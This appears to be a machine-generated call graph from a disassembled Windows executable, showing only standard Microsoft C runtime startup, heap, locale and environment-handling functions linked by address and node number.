__calloc_impl 7019->6982 7021 402508 7020->7021 7021->6986 7140 40246c 7021->7140 7023 4052d2 7022->7023 7024 4052cb 7022->7024 7026 40543a 7023->7026 7027 4052dc GetProcAddress GetProcAddress GetProcAddress GetProcAddress 7023->7027 7158 402134 7024->7158 7217 404fd1 7026->7217 7029 405325 TlsAlloc 7027->7029 7032 40251a 7029->7032 7033 405373 TlsSetValue 7029->7033 7032->6990 7032->6991 7033->7032 7034 405384 7033->7034 7162 40241e 7034->7162 7039 404ea7 __encode_pointer 6 API calls 7040 4053a4 7039->7040 7041 404ea7 __encode_pointer 6 API calls 7040->7041 7042 4053b4 7041->7042 7043 404ea7 __encode_pointer 6 API calls 7042->7043 7044 4053c4 7043->7044 7179 403d7d 7044->7179 7051 404f22 __decode_pointer 6 API calls 7052 405418 7051->7052 7052->7026 7053 40541f 7052->7053 7199 40500e 7053->7199 7055 405427 GetCurrentThreadId 7055->7032 7549 40379c 7056->7549 7058 403337 GetStartupInfoA 7059 4039d1 __calloc_crt 67 API calls 7058->7059 7067 403358 7059->7067 7060 403576 __calloc_impl 7060->6993 7061 4034f3 GetStdHandle 7066 4034bd 7061->7066 7062 4039d1 __calloc_crt 67 API calls 7062->7067 7063 403558 SetHandleCount 7063->7060 7064 403505 GetFileType 7064->7066 7065 403440 7065->7060 7065->7066 7068 403469 GetFileType 7065->7068 7070 405f27 __alloc_osfhnd InitializeCriticalSectionAndSpinCount 7065->7070 7066->7060 7066->7061 7066->7063 7066->7064 7069 405f27 __alloc_osfhnd InitializeCriticalSectionAndSpinCount 7066->7069 7067->7060 7067->7062 7067->7065 7067->7066 7068->7065 7069->7066 7070->7065 7072 4063dd 7071->7072 7073 4063be GetEnvironmentStringsW 7071->7073 7075 4063c6 7072->7075 7076 406476 7072->7076 7074 4063d2 GetLastError 7073->7074 7073->7075 7074->7072 7077 4063f9 GetEnvironmentStringsW 7075->7077 7082 406408 WideCharToMultiByte 7075->7082 7078 40647f GetEnvironmentStrings 7076->7078 7080 40254f 7076->7080 7077->7080 7077->7082 7078->7080 7081 40648f 7078->7081 7096 4062e5 7080->7096 7081->7081 7086 40398c __malloc_crt 67 API calls 7081->7086 7083 40646b FreeEnvironmentStringsW 7082->7083 7084 40643c 7082->7084 7083->7080 7085 40398c __malloc_crt 67 API calls 7084->7085 7088 406442 7085->7088 7087 4064a9 7086->7087 7089 4064b0 FreeEnvironmentStringsA 7087->7089 7090 4064bc __cenvarg 7087->7090 7088->7083 7091 40644a WideCharToMultiByte 7088->7091 7089->7080 7094 4064c6 FreeEnvironmentStringsA 7090->7094 7092 406464 7091->7092 7093 40645c 7091->7093 7092->7083 7095 403abd __mtdeletelocks 67 API calls 7093->7095 7094->7080 7095->7092 7097 4062fa 7096->7097 7098 4062ff GetModuleFileNameA 7096->7098 7556 404b64 7097->7556 7100 406326 7098->7100 7550 40614b 7100->7550 7102 402559 7102->7001 7102->7003 7104 40398c __malloc_crt 67 API calls 7105 406368 7104->7105 7105->7102 7106 40614b _parse_cmdline 77 API calls 7105->7106 7106->7102 7108 406076 7107->7108 7111 40607b _strlen 7107->7111 7109 404b64 ___initmbctable 111 API calls 7108->7109 7109->7111 7110 40256a 7110->7005 7110->7006 7111->7110 7112 4039d1 __calloc_crt 67 API calls 7111->7112 7117 4060b0 _strlen 7112->7117 7113 40610e 7114 403abd __mtdeletelocks 67 API calls 7113->7114 7114->7110 7115 4039d1 __calloc_crt 67 API calls 7115->7117 7116 406134 7118 403abd __mtdeletelocks 67 API calls 7116->7118 7117->7110 7117->7113 7117->7115 7117->7116 7119 408f6b _strcpy_s 67 API calls 7117->7119 7120 4060f5 7117->7120 7118->7110 7119->7117 7120->7117 7121 4035c0 __invoke_watson 10 API calls 7120->7121 7121->7120 7124 402231 __IsNonwritableInCurrentImage 7122->7124 7967 4059ce 7124->7967 7125 40224f __initterm_e 7127 40226e __IsNonwritableInCurrentImage __initterm 7125->7127 7971 40596b 7125->7971 7127->7008 7129 40601c 7128->7129 7132 406021 7128->7132 7130 404b64 ___initmbctable 111 API calls 7129->7130 7130->7132 7131 40258d 7134 4017b0 7131->7134 7132->7131 7133 404364 _parse_cmdline 77 API calls 7132->7133 7133->7132 8071 4014e0 GetModuleFileNameA 7134->8071 7136 4017c4 7136->7015 7137 4023d4 7136->7137 7138 4022a8 _doexit 67 API calls 7137->7138 7139 4023e5 7138->7139 7139->7015 7141 40247a 7140->7141 7142 40247f 7140->7142 7143 40580b __FF_MSGBANNER 67 API calls 7141->7143 7144 405660 __NMSG_WRITE 67 API calls 7142->7144 7143->7142 7145 402487 7144->7145 7146 4021b8 _fast_error_exit 3 API calls 7145->7146 7147 402491 7146->7147 7147->6986 7149 40580b __FF_MSGBANNER 67 API calls 7148->7149 7150 40216e 7149->7150 7151 405660 __NMSG_WRITE 67 API calls 7150->7151 7152 402176 7151->7152 7153 404f22 __decode_pointer 6 API calls 7152->7153 7154 402181 7153->7154 7154->6994 7156 4022a8 _doexit 67 API calls 7155->7156 7157 40240b 7156->7157 7157->7018 7159 40213f Sleep GetModuleHandleW 7158->7159 7160 402161 7159->7160 7161 40215d 7159->7161 7160->7023 7161->7159 7161->7160 7223 404f19 7162->7223 7164 402426 __init_pointers __initp_misc_winsig 7226 405b76 7164->7226 7167 404ea7 __encode_pointer 6 API calls 7168 402462 7167->7168 7169 404ea7 TlsGetValue 7168->7169 7170 404ee0 GetModuleHandleW 7169->7170 7171 404ebf 7169->7171 7173 404ef0 7170->7173 7174 404efb GetProcAddress 7170->7174 7171->7170 7172 404ec9 TlsGetValue 7171->7172 7176 404ed4 7172->7176 7175 402134 __crt_waiting_on_module_handle 2 API calls 7173->7175 7178 404ed8 7174->7178 7177 404ef6 7175->7177 7176->7170 7176->7178 7177->7174 7177->7178 7178->7039 7180 403d88 7179->7180 7182 403db6 7180->7182 7229 405f27 7180->7229 7182->7026 7183 404f22 TlsGetValue 7182->7183 7184 404f3a 7183->7184 7185 404f5b GetModuleHandleW 7183->7185 7184->7185 7186 404f44 TlsGetValue 7184->7186 7187 404f76 GetProcAddress 7185->7187 7188 404f6b 7185->7188 7191 404f4f 7186->7191 7190 404f53 7187->7190 7189 402134 __crt_waiting_on_module_handle 2 API calls 7188->7189 7192 404f71 7189->7192 7190->7026 7193 4039d1 7190->7193 7191->7185 7191->7190 7192->7187 7192->7190 7195 4039da 7193->7195 7196 403a17 7195->7196 7197 4039f8 Sleep 7195->7197 7234 403f2c 7195->7234 7196->7026 7196->7051 7198 403a0d 7197->7198 7198->7195 7198->7196 7528 40379c 7199->7528 7201 40501a GetModuleHandleW 7202 405030 7201->7202 7203 40502a 7201->7203 7204 405048 GetProcAddress GetProcAddress 7202->7204 7205 40506c 7202->7205 7206 402134 __crt_waiting_on_module_handle 2 API calls 7203->7206 7204->7205 7207 403ef9 __lock 63 API calls 7205->7207 7206->7202 7208 40508b InterlockedIncrement 7207->7208 7529 4050e3 7208->7529 7211 403ef9 __lock 63 API calls 7212 4050ac 7211->7212 7532 404ccb InterlockedIncrement 7212->7532 7214 4050ca 7544 4050ec 7214->7544 7216 4050d7 __calloc_impl 7216->7055 7218 404fe7 7217->7218 7219 404fdb 7217->7219 7220 405009 7218->7220 7221 404ffb TlsFree 7218->7221 7222 404f22 __decode_pointer 6 API calls 7219->7222 7220->7220 7221->7220 7222->7218 7224 404ea7 __encode_pointer 6 API calls 7223->7224 7225 404f20 7224->7225 7225->7164 7227 404ea7 __encode_pointer 6 API calls 7226->7227 7228 402458 7227->7228 7228->7167 7233 40379c 7229->7233 7231 405f33 InitializeCriticalSectionAndSpinCount 7232 405f77 __calloc_impl 7231->7232 7232->7180 7233->7231 7235 403f38 __calloc_impl 7234->7235 7236 403f50 7235->7236 7246 403f6f _memset 7235->7246 7247 403750 7236->7247 7240 403fe1 HeapAlloc 7240->7246 7241 403f65 __calloc_impl 7241->7195 7246->7240 7246->7241 7253 403ef9 7246->7253 7260 407601 7246->7260 7266 404028 7246->7266 7269 405f96 7246->7269 7272 4050f5 GetLastError 7247->7272 7249 403755 7250 4036e8 7249->7250 7251 404f22 __decode_pointer 6 API calls 7250->7251 7252 4036f8 __invoke_watson 7251->7252 7254 403f21 EnterCriticalSection 7253->7254 7255 403f0e 7253->7255 7254->7246 7320 403e36 7255->7320 7257 403f14 7257->7254 7258 402164 __amsg_exit 66 API calls 7257->7258 7259 403f20 7258->7259 7259->7254 7261 40762f 7260->7261 7262 4076c8 7261->7262 7265 4076d1 7261->7265 7516 407168 7261->7516 7262->7265 7523 407218 7262->7523 7265->7246 7527 403e1f LeaveCriticalSection 7266->7527 7268 40402f 7268->7246 7270 404f22 __decode_pointer 6 API calls 7269->7270 7271 405fa6 7270->7271 7271->7246 7287 404f9d TlsGetValue 7272->7287 7275 405162 SetLastError 7275->7249 7276 4039d1 __calloc_crt 64 API calls 7277 405120 7276->7277 7277->7275 7278 405128 7277->7278 7279 404f22 __decode_pointer 6 API calls 7278->7279 7280 40513a 7279->7280 7281 405141 7280->7281 7282 405159 7280->7282 7283 40500e __initptd 64 API calls 7281->7283 7292 403abd 7282->7292 7285 405149 GetCurrentThreadId 7283->7285 7285->7275 7286 40515f 7286->7275 7288 404fb2 7287->7288 7289 404fcd 7287->7289 7290 404f22 __decode_pointer 6 API calls 7288->7290 7289->7275 7289->7276 7291 404fbd TlsSetValue 7290->7291 7291->7289 7294 403ac9 __calloc_impl 7292->7294 7293 403b42 __dosmaperr __calloc_impl 7293->7286 7294->7293 7295 403ef9 __lock 65 API calls 7294->7295 7304 403b08 7294->7304 7300 403ae0 ___sbh_find_block 7295->7300 7296 403b1d HeapFree 7296->7293 7297 403b2f 7296->7297 7298 403750 _strcpy_s 65 API calls 7297->7298 7299 403b34 GetLastError 7298->7299 7299->7293 7301 403afa 7300->7301 7305 406e52 7300->7305 7312 403b13 7301->7312 7304->7293 7304->7296 7306 407133 7305->7306 7307 406e91 7305->7307 7306->7301 7307->7306 7308 40707d VirtualFree 7307->7308 7309 4070e1 7308->7309 7309->7306 7310 4070f0 VirtualFree HeapFree 7309->7310 7315 409d20 7310->7315 7319 403e1f LeaveCriticalSection 7312->7319 7314 403b1a 7314->7304 7316 409d38 7315->7316 7317 409d67 7316->7317 7318 409d5f __VEC_memcpy 7316->7318 7317->7306 7318->7317 7319->7314 7321 403e42 __calloc_impl 7320->7321 7322 403e52 7321->7322 7323 403e6a 7321->7323 7348 40580b 7322->7348 7329 403e78 __calloc_impl 7323->7329 7394 40398c 7323->7394 7329->7257 7331 403e99 7335 403ef9 __lock 67 API calls 7331->7335 7332 403e8a 7334 403750 _strcpy_s 67 API calls 7332->7334 7334->7329 7336 403ea0 7335->7336 7338 403ed4 7336->7338 7339 403ea8 7336->7339 7341 403abd __mtdeletelocks 67 API calls 7338->7341 7340 405f27 __alloc_osfhnd InitializeCriticalSectionAndSpinCount 7339->7340 7342 403eb3 7340->7342 7347 403ec5 7341->7347 7343 403abd __mtdeletelocks 67 API calls 7342->7343 7342->7347 7345 403ebf 7343->7345 7346 403750 _strcpy_s 67 API calls 7345->7346 7346->7347 7400 403ef0 7347->7400 7403 409770 7348->7403 7351 40581f 7353 405660 __NMSG_WRITE 67 API calls 7351->7353 7355 403e57 7351->7355 7352 409770 __set_error_mode 67 API calls 7352->7351 7354 405837 7353->7354 7356 405660 __NMSG_WRITE 67 API calls 7354->7356 7357 405660 7355->7357 7356->7355 7358 405674 7357->7358 7359 409770 __set_error_mode 64 API calls 7358->7359 7390 403e5e 7358->7390 7360 405696 7359->7360 7361 4057d4 GetStdHandle 7360->7361 7362 409770 __set_error_mode 64 API calls 7360->7362 7363 4057e2 _strlen 7361->7363 7361->7390 7364 4056a7 7362->7364 7366 4057fb WriteFile 7363->7366 7363->7390 7364->7361 7365 4056b9 7364->7365 7365->7390 7409 408f6b 7365->7409 7366->7390 7369 4056ef GetModuleFileNameA 7371 40570d 7369->7371 7377 405730 _strlen 7369->7377 7373 408f6b _strcpy_s 64 API calls 7371->7373 7374 40571d 7373->7374 7376 4035c0 __invoke_watson 10 API calls 7374->7376 7374->7377 7375 405773 7434 408df6 7375->7434 7376->7377 7377->7375 7425 408eb6 7377->7425 7381 405797 7384 408df6 _strcat_s 64 API calls 7381->7384 7383 4035c0 __invoke_watson 10 API calls 7383->7381 7385 4057ab 7384->7385 7387 4057bc 7385->7387 7388 4035c0 __invoke_watson 10 API calls 7385->7388 7386 4035c0 __invoke_watson 10 API calls 7386->7375 7443 409607 7387->7443 7388->7387 7391 4021b8 7390->7391 7481 40218d GetModuleHandleW 7391->7481 7396 403995 7394->7396 7397 4039cb 7396->7397 7398 4039ac Sleep 7396->7398 7485 406ac2 7396->7485 7397->7331 7397->7332 7399 4039c1 7398->7399 7399->7396 7399->7397 7515 403e1f LeaveCriticalSection 7400->7515 7402 403ef7 7402->7329 7404 40977f 7403->7404 7405 403750 _strcpy_s 67 API calls 7404->7405 7406 405812 7404->7406 7407 4097a2 7405->7407 7406->7351 7406->7352 7408 4036e8 _strcpy_s 6 API calls 7407->7408 7408->7406 7410 408f7c 7409->7410 7413 408f83 7409->7413 7410->7413 7416 408fa9 7410->7416 7411 403750 _strcpy_s 67 API calls 7412 408f88 7411->7412 7414 4036e8 _strcpy_s 6 API calls 7412->7414 7413->7411 7415 4056db 7414->7415 7415->7369 7418 4035c0 7415->7418 7416->7415 7417 403750 _strcpy_s 67 API calls 7416->7417 7417->7412 7470 401ae0 7418->7470 7420 4035ed IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 7421 4036c9 GetCurrentProcess TerminateProcess 7420->7421 7422 4036bd __invoke_watson 7420->7422 7472 401ee2 7421->7472 7422->7421 7424 4036e6 7424->7369 7430 408ec8 7425->7430 7426 408ecc 7427 405760 7426->7427 7428 403750 _strcpy_s 67 API calls 7426->7428 7427->7375 7427->7386 7429 408ee8 7428->7429 7431 4036e8 _strcpy_s 6 API calls 7429->7431 7430->7426 7430->7427 7432 408f12 7430->7432 7431->7427 7432->7427 7433 403750 _strcpy_s 67 API calls 7432->7433 7433->7429 7437 408e0e 7434->7437 7438 408e07 7434->7438 7435 403750 _strcpy_s 67 API calls 7436 408e13 7435->7436 7439 4036e8 _strcpy_s 6 API calls 7436->7439 7437->7435 7438->7437 7440 408e42 7438->7440 7441 405786 7439->7441 7440->7441 7442 403750 _strcpy_s 67 API calls 7440->7442 7441->7381 7441->7383 7442->7436 7444 404f19 __init_pointers 6 API calls 7443->7444 7445 409617 7444->7445 7446 4096b2 7445->7446 7447 40962a LoadLibraryA 7445->7447 7454 404f22 __decode_pointer 6 API calls 7446->7454 7466 4096dc 7446->7466 7448 409754 7447->7448 7449 40963f GetProcAddress 7447->7449 7448->7390 7449->7448 7451 409655 7449->7451 7450 409707 7452 404f22 __decode_pointer 6 API calls 7450->7452 7455 404ea7 __encode_pointer 6 API calls 7451->7455 7452->7448 7453 404f22 __decode_pointer 6 API calls 7464 40971f 7453->7464 7456 4096cf 7454->7456 7457 40965b GetProcAddress 7455->7457 7458 404f22 __decode_pointer 6 API calls 7456->7458 7459 404ea7 __encode_pointer 6 API calls 7457->7459 7458->7466 7460 409670 GetProcAddress 7459->7460 7461 404ea7 __encode_pointer 6 API calls 7460->7461 7462 409685 GetProcAddress 7461->7462 7463 404ea7 __encode_pointer 6 API calls 7462->7463 7467 40969a 7463->7467 7464->7450 7465 404f22 __decode_pointer 6 API calls 7464->7465 7465->7450 7466->7450 7466->7453 7467->7446 7468 4096a4 GetProcAddress 7467->7468 7469 404ea7 __encode_pointer 6 API calls 7468->7469 7469->7446 7471 401aec __VEC_memzero 7470->7471 7471->7420 7473 401eea 7472->7473 7474 401eec IsDebuggerPresent 7472->7474 7473->7424 7480 406915 7474->7480 7477 404466 SetUnhandledExceptionFilter UnhandledExceptionFilter 7478 40448b GetCurrentProcess TerminateProcess 7477->7478 7479 404483 __invoke_watson 7477->7479 7478->7424 7479->7478 7480->7477 7482 4021a1 GetProcAddress 7481->7482 7483 4021b6 ExitProcess 7481->7483 7482->7483 7484 4021b1 7482->7484 7484->7483 7486 406b75 7485->7486 7495 406ad4 7485->7495 7487 405f96 __calloc_impl 6 API calls 7486->7487 7488 406b7b 7487->7488 7490 403750 _strcpy_s 66 API calls 7488->7490 7489 40580b __FF_MSGBANNER 66 API calls 7494 406ae5 7489->7494 7502 406b6d 7490->7502 7492 405660 __NMSG_WRITE 66 API calls 7492->7494 7493 406b31 HeapAlloc 7493->7495 7494->7489 7494->7492 7494->7493 7494->7495 7496 4021b8 _fast_error_exit 3 API calls 7494->7496 7495->7494 7497 406b61 7495->7497 7499 405f96 __calloc_impl 6 API calls 7495->7499 7500 406b66 7495->7500 7495->7502 7503 406a73 7495->7503 7496->7494 7498 403750 _strcpy_s 66 API calls 7497->7498 7498->7500 7499->7495 7501 403750 _strcpy_s 66 API calls 7500->7501 7501->7502 7502->7396 7504 406a7f __calloc_impl 7503->7504 7505 406ab0 __calloc_impl 7504->7505 7506 403ef9 __lock 67 API calls 7504->7506 7505->7495 7507 406a95 7506->7507 7508 407601 ___sbh_alloc_block 5 API calls 7507->7508 7509 406aa0 7508->7509 7511 406ab9 7509->7511 7514 403e1f LeaveCriticalSection 7511->7514 7513 406ac0 7513->7505 7514->7513 7515->7402 7517 40717b HeapReAlloc 7516->7517 7518 4071af HeapAlloc 7516->7518 7519 40719d 7517->7519 7522 407199 7517->7522 7520 4071d2 VirtualAlloc 7518->7520 7518->7522 7519->7518 7521 4071ec HeapFree 7520->7521 7520->7522 7521->7522 7522->7262 7524 40722f VirtualAlloc 7523->7524 7526 407276 7524->7526 7526->7265 7527->7268 7528->7201 7547 403e1f LeaveCriticalSection 7529->7547 7531 4050a5 7531->7211 7533 404ce9 InterlockedIncrement 7532->7533 7534 404cec 7532->7534 7533->7534 7535 404cf6 InterlockedIncrement 7534->7535 7536 404cf9 7534->7536 7535->7536 7537 404d03 InterlockedIncrement 7536->7537 7538 404d06 7536->7538 7537->7538 7539 404d10 InterlockedIncrement 7538->7539 7540 404d13 7538->7540 7539->7540 7541 404d2c InterlockedIncrement 7540->7541 7542 404d3c InterlockedIncrement 7540->7542 7543 404d47 InterlockedIncrement 7540->7543 7541->7540 7542->7540 7543->7214 7548 403e1f LeaveCriticalSection 7544->7548 7546 4050f3 7546->7216 7547->7531 7548->7546 7549->7058 7551 40616a 7550->7551 7554 4061d7 7551->7554 7560 404364 7551->7560 7553 4062d5 7553->7102 7553->7104 7554->7553 7555 404364 77 API calls _parse_cmdline 7554->7555 7555->7554 7557 404b6d 7556->7557 7558 404b74 7556->7558 7782 4049ca 7557->7782 7558->7098 7563 4042f8 7560->7563 7566 401ef1 7563->7566 7565 40430b 7565->7551 7567 401f04 7566->7567 7571 401f51 7566->7571 7574 40516e 7567->7574 7571->7565 7572 401f31 7572->7571 7594 4046c5 7572->7594 7575 4050f5 __getptd_noexit 67 API calls 7574->7575 7576 405176 7575->7576 7577 401f09 7576->7577 7578 402164 __amsg_exit 67 API calls 7576->7578 7577->7572 7579 404e31 7577->7579 7578->7577 7580 404e3d __calloc_impl 7579->7580 7581 40516e __getptd 67 API calls 7580->7581 7582 404e42 7581->7582 7583 404e70 7582->7583 7584 404e54 7582->7584 7585 403ef9 __lock 67 API calls 7583->7585 7586 40516e __getptd 67 API calls 7584->7586 7587 404e77 7585->7587 7588 404e59 7586->7588 7610 404df3 7587->7610 7591 404e67 __calloc_impl 7588->7591 7593 402164 __amsg_exit 67 API calls 7588->7593 7591->7572 7593->7591 7595 4046d1 __calloc_impl 7594->7595 7596 40516e __getptd 67 API calls 7595->7596 7597 4046d6 7596->7597 7598 403ef9 __lock 67 API calls 7597->7598 7607 4046e8 7597->7607 7599 404706 7598->7599 7600 40474f 7599->7600 7604 404737 InterlockedIncrement 7599->7604 7605 40471d InterlockedDecrement 7599->7605 7778 404760 7600->7778 7601 402164 __amsg_exit 67 API calls 7603 4046f6 __calloc_impl 7601->7603 7603->7571 7604->7600 7605->7604 7606 404728 7605->7606 7606->7604 7608 403abd __mtdeletelocks 67 API calls 7606->7608 7607->7601 7607->7603 7609 404736 7608->7609 7609->7604 7611 404df7 7610->7611 7612 404e29 7610->7612 7611->7612 7613 404ccb ___addlocaleref 8 API calls 7611->7613 7618 404e9b 7612->7618 7614 404e0a 7613->7614 7614->7612 7621 404d5a 7614->7621 7777 403e1f LeaveCriticalSection 7618->7777 7620 404ea2 7620->7588 7622 404d6b InterlockedDecrement 7621->7622 7623 404dee 7621->7623 7624 404d80 InterlockedDecrement 7622->7624 7625 404d83 7622->7625 7623->7612 7635 404b82 7623->7635 7624->7625 7626 404d90 7625->7626 7627 404d8d InterlockedDecrement 7625->7627 7628 404d9a InterlockedDecrement 7626->7628 7629 404d9d 7626->7629 7627->7626 7628->7629 7630 404da7 InterlockedDecrement 7629->7630 7632 404daa 7629->7632 7630->7632 7631 404dc3 InterlockedDecrement 7631->7632 7632->7631 7633 404dde InterlockedDecrement 7632->7633 7634 404dd3 InterlockedDecrement 7632->7634 7633->7623 7634->7632 7636 404c06 7635->7636 7637 404b99 7635->7637 7638 404c53 7636->7638 7639 403abd __mtdeletelocks 67 API calls 7636->7639 7637->7636 7646 403abd __mtdeletelocks 67 API calls 7637->7646 7648 404bcd 7637->7648 7649 404c7a 7638->7649 7689 408b8e 7638->7689 7641 404c27 7639->7641 7643 403abd __mtdeletelocks 67 API calls 7641->7643 7650 404c3a 7643->7650 7644 403abd __mtdeletelocks 67 API calls 7651 404bfb 7644->7651 7645 404cbf 7652 403abd __mtdeletelocks 67 API calls 7645->7652 7653 404bc2 7646->7653 7647 403abd __mtdeletelocks 67 API calls 7647->7649 7654 403abd __mtdeletelocks 67 API calls 7648->7654 7664 404bee 7648->7664 7649->7645 7655 403abd 67 API calls __mtdeletelocks 7649->7655 7656 403abd __mtdeletelocks 67 API calls 7650->7656 7657 403abd __mtdeletelocks 67 API calls 7651->7657 7658 404cc5 7652->7658 7665 408d68 7653->7665 7660 404be3 7654->7660 7655->7649 7661 404c48 7656->7661 7657->7636 7658->7612 7681 408d23 7660->7681 7663 403abd __mtdeletelocks 67 API calls 7661->7663 7663->7638 7664->7644 7666 408df2 7665->7666 7667 408d75 7665->7667 7666->7648 7668 408d86 7667->7668 7669 403abd __mtdeletelocks 67 API calls 7667->7669 7670 408d98 7668->7670 7671 403abd __mtdeletelocks 67 API calls 7668->7671 7669->7668 7672 408daa 7670->7672 7673 403abd __mtdeletelocks 67 API calls 7670->7673 7671->7670 7674 408dbc 7672->7674 7675 403abd __mtdeletelocks 67 API calls 7672->7675 7673->7672 7676 408dce 7674->7676 7677 403abd __mtdeletelocks 67 API calls 7674->7677 7675->7674 7678 408de0 7676->7678 7679 403abd __mtdeletelocks 67 API calls 7676->7679 7677->7676 7678->7666 7680 403abd __mtdeletelocks 67 API calls 7678->7680 7679->7678 7680->7666 7682 408d30 7681->7682 7683 408d64 7681->7683 7684 408d40 7682->7684 7685 403abd __mtdeletelocks 67 API calls 7682->7685 7683->7664 7686 408d52 7684->7686 7687 403abd __mtdeletelocks 67 API calls 7684->7687 7685->7684 7686->7683 7688 403abd __mtdeletelocks 67 API calls 7686->7688 7687->7686 7688->7683 7690 404c73 7689->7690 7691 408b9f 7689->7691 7690->7647 7692 403abd __mtdeletelocks 67 API calls 7691->7692 7693 408ba7 7692->7693 7694 403abd __mtdeletelocks 67 API calls 7693->7694 7695 408baf 7694->7695 7696 403abd __mtdeletelocks 67 API calls 7695->7696 7697 408bb7 7696->7697 7698 403abd __mtdeletelocks 67 API calls 7697->7698 7699 408bbf 7698->7699 7700 403abd __mtdeletelocks 67 API calls 7699->7700 7701 408bc7 7700->7701 7702 403abd __mtdeletelocks 67 API calls 7701->7702 7703 408bcf 7702->7703 7704 403abd __mtdeletelocks 67 API calls 7703->7704 7705 408bd6 7704->7705 7706 403abd __mtdeletelocks 67 API calls 7705->7706 7707 408bde 7706->7707 7708 403abd __mtdeletelocks 67 API calls 7707->7708 7709 408be6 7708->7709 7710 403abd __mtdeletelocks 67 API calls 7709->7710 7711 408bee 7710->7711 7712 403abd __mtdeletelocks 67 API calls 7711->7712 7713 408bf6 7712->7713 7714 403abd __mtdeletelocks 67 API calls 7713->7714 7715 408bfe 7714->7715 7716 403abd __mtdeletelocks 67 API calls 7715->7716 7717 408c06 7716->7717 7718 403abd __mtdeletelocks 67 API calls 7717->7718 7719 408c0e 7718->7719 7720 403abd __mtdeletelocks 67 API calls 7719->7720 7721 408c16 7720->7721 7722 403abd __mtdeletelocks 67 API calls 7721->7722 7723 408c1e 7722->7723 7724 403abd __mtdeletelocks 67 API calls 7723->7724 7725 408c29 7724->7725 7726 403abd __mtdeletelocks 67 API calls 7725->7726 7727 408c31 7726->7727 7728 403abd __mtdeletelocks 67 API calls 7727->7728 7729 408c39 7728->7729 7730 403abd __mtdeletelocks 67 API calls 7729->7730 7731 408c41 7730->7731 7732 403abd __mtdeletelocks 67 API calls 7731->7732 7733 408c49 7732->7733 7734 403abd __mtdeletelocks 67 API calls 7733->7734 7735 408c51 7734->7735 7736 403abd __mtdeletelocks 67 API calls 7735->7736 7737 408c59 7736->7737 7738 403abd __mtdeletelocks 67 API calls 7737->7738 7739 408c61 7738->7739 7740 403abd __mtdeletelocks 67 API calls 7739->7740 7741 408c69 7740->7741 7742 403abd __mtdeletelocks 67 API calls 7741->7742 7743 408c71 7742->7743 7744 403abd __mtdeletelocks 67 API calls 7743->7744 7745 408c79 7744->7745 7746 403abd __mtdeletelocks 67 API calls 7745->7746 7747 408c81 7746->7747 7748 403abd __mtdeletelocks 67 API calls 7747->7748 7749 408c89 7748->7749 7750 403abd __mtdeletelocks 67 API calls 7749->7750 7751 408c91 7750->7751 7752 403abd __mtdeletelocks 67 API calls 7751->7752 7753 408c99 7752->7753 7754 403abd __mtdeletelocks 67 API calls 7753->7754 7755 408ca1 7754->7755 7756 403abd __mtdeletelocks 67 API calls 7755->7756 7757 408caf 7756->7757 7758 403abd __mtdeletelocks 67 API calls 7757->7758 7759 408cba 7758->7759 7760 403abd __mtdeletelocks 67 API calls 7759->7760 7761 408cc5 7760->7761 7762 403abd __mtdeletelocks 67 API calls 7761->7762 7763 408cd0 7762->7763 7764 403abd __mtdeletelocks 67 API calls 7763->7764 7765 408cdb 7764->7765 7766 403abd __mtdeletelocks 67 API calls 7765->7766 7767 408ce6 7766->7767 7768 403abd __mtdeletelocks 67 API calls 7767->7768 7769 408cf1 7768->7769 7770 403abd __mtdeletelocks 67 API calls 7769->7770 7771 408cfc 7770->7771 7772 403abd __mtdeletelocks 67 API calls 7771->7772 7773 408d07 7772->7773 7774 403abd __mtdeletelocks 67 API calls 7773->7774 7775 408d12 7774->7775 7776 403abd __mtdeletelocks 67 API calls 7775->7776 7776->7690 7777->7620 7781 403e1f LeaveCriticalSection 7778->7781 7780 404767 7780->7607 7781->7780 7783 4049d6 __calloc_impl 7782->7783 7784 40516e __getptd 67 API calls 7783->7784 7785 4049df 7784->7785 7786 4046c5 __setmbcp 69 API calls 7785->7786 7787 4049e9 7786->7787 7813 404769 7787->7813 7790 40398c __malloc_crt 67 API calls 7791 404a0a 7790->7791 7792 404b29 __calloc_impl 7791->7792 7820 4047e5 7791->7820 7792->7558 7795 404b36 7795->7792 7800 404b49 7795->7800 7801 403abd __mtdeletelocks 67 API calls 7795->7801 7796 404a3a InterlockedDecrement 7797 404a4a 7796->7797 7798 404a5b InterlockedIncrement 7796->7798 7797->7798 7803 403abd __mtdeletelocks 67 API calls 7797->7803 7798->7792 7799 404a71 7798->7799 7799->7792 7804 403ef9 __lock 67 API calls 7799->7804 7802 403750 _strcpy_s 67 API calls 7800->7802 7801->7800 7802->7792 7805 404a5a 7803->7805 7806 404a85 InterlockedDecrement 7804->7806 7805->7798 7808 404b01 7806->7808 7809 404b14 InterlockedIncrement 7806->7809 7808->7809 7811 403abd __mtdeletelocks 67 API calls 7808->7811 7830 404b2b 7809->7830 7812 404b13 7811->7812 7812->7809 7814 401ef1 _LocaleUpdate::_LocaleUpdate 77 API calls 7813->7814 7815 40477d 7814->7815 7816 4047a6 7815->7816 7817 404788 GetOEMCP 7815->7817 7818 4047ab GetACP 7816->7818 7819 404798 7816->7819 7817->7819 7818->7819 7819->7790 7819->7792 7821 404769 getSystemCP 79 API calls 7820->7821 7822 404805 7821->7822 7823 404810 setSBCS 7822->7823 7826 404854 IsValidCodePage 7822->7826 7828 404879 _memset __setmbcp_nolock 7822->7828 7824 401ee2 __invoke_watson 5 API calls 7823->7824 7825 4049c8 7824->7825 7825->7795 7825->7796 7826->7823 7827 404866 GetCPInfo 7826->7827 7827->7823 7827->7828 7833 404532 GetCPInfo 7828->7833 7966 403e1f LeaveCriticalSection 7830->7966 7832 404b32 7832->7792 7834 404618 7833->7834 7837 404566 _memset 7833->7837 7839 401ee2 __invoke_watson 5 API calls 7834->7839 7843 408b4c 7837->7843 7841 4046c3 7839->7841 7841->7828 7842 40894d ___crtLCMapStringA 102 API calls 7842->7834 7844 401ef1 _LocaleUpdate::_LocaleUpdate 77 API calls 7843->7844 7845 408b5f 7844->7845 7853 408992 7845->7853 7848 40894d 7849 401ef1 _LocaleUpdate::_LocaleUpdate 77 API calls 7848->7849 7850 408960 7849->7850 7919 4085a8 7850->7919 7854 4089b3 GetStringTypeW 7853->7854 7855 4089de 7853->7855 7857 4089d3 GetLastError 7854->7857 7858 4089cb 7854->7858 7856 408ac5 7855->7856 7855->7858 7881 40a82a GetLocaleInfoA 7856->7881 7857->7855 7859 408a17 MultiByteToWideChar 7858->7859 7876 408abf 7858->7876 7866 408a44 7859->7866 7859->7876 7861 401ee2 __invoke_watson 5 API calls 7864 4045d3 7861->7864 7863 408a59 _memset 